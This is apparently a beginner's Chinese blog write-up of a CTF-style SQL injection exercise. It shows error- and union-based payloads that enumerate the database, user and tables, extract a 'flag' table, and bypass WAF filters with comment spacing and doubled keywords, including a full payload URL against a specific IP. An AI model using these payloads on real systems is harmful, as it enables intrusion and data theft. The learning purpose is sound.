小白的sql注入

判断有无单引号报护

10651191-2d5e103e6fa43032.png

如果有单引号报护,
1' #

注释掉其后的单引号

and 1=1

1' and 1=1 #

10651191-ca5bb17a1546d74e.png
依然回显数据

1 and 1=2

10651191-111f574244fba2db.png

解决了我的一个疑惑, 就是如果 是 ’1 and 1=2' 还会不会执行语句, 现在看来是会的

1' order by 10 #


10651191-c6dcbbe0fb086c8a.png

然后就判断数据表只有 4列

1' union select database(), user() #

10651191-4e4b366082277a43.png

提示列数不一样


10651191-e43ec7bfbe876216.png

1' union select database(),2,3 , 4#

10651191-824d2e9e185d0296.png
image.png
10651191-760039a94404a2e6.png

1' union select database(),2,3 , user()#

10651191-cc1b7da7bfb9c6f4.png

所以database是 luozhen
用户名是 luozhen@127.0.0.1

1' union select table_name,table_schema 3,4 from information_schema.tables where table_schema= 'luozhen'#

获得了版本信息


10651191-e93782acefe97183.png

@@version_compile_os
用这个得到了操作系统的信息

10651191-efcdc60cbdd80171.png

1' union select table_name,table_schema 3,4 from information_schema.tables where table_schema= 'luozhen'#

这个出问题了,并没有成功


10651191-0ba67ef3de10de1b.png

1' union select table_name,table_schema ,3,4 from information_schema.tables where table_schema= 'luozhen'#

原来是少了个逗号

10651191-ada07e7ef4e83c55.png
ok这次成功了

说明有一个flag的表

哇哈好兴奋, 成功了

payload 如下:

1' union select 1,flag, 2,3 from flag#


10651191-08a84819b45442c2.png

绕过waf的几种方式

绕过空格

用() 或者 /**/

10651191-e2e79661df441048.png
绕过空格

绕过 =

用<>

提取字符

ascii()默认提取第一个字符
mid()from 1 for 3
substr()
surstring()

拼接字符

concat()

注入分类

基于布尔的盲注

这是异或注入


10651191-993f0559365603f3.png

http://120.24.86.145:9004/1ndex.php?id=-1' ununionion seselectlect 1,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database()--+

再补充一点和mysql相关的。。


10651191-83e8f6dad2bbd615.png
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值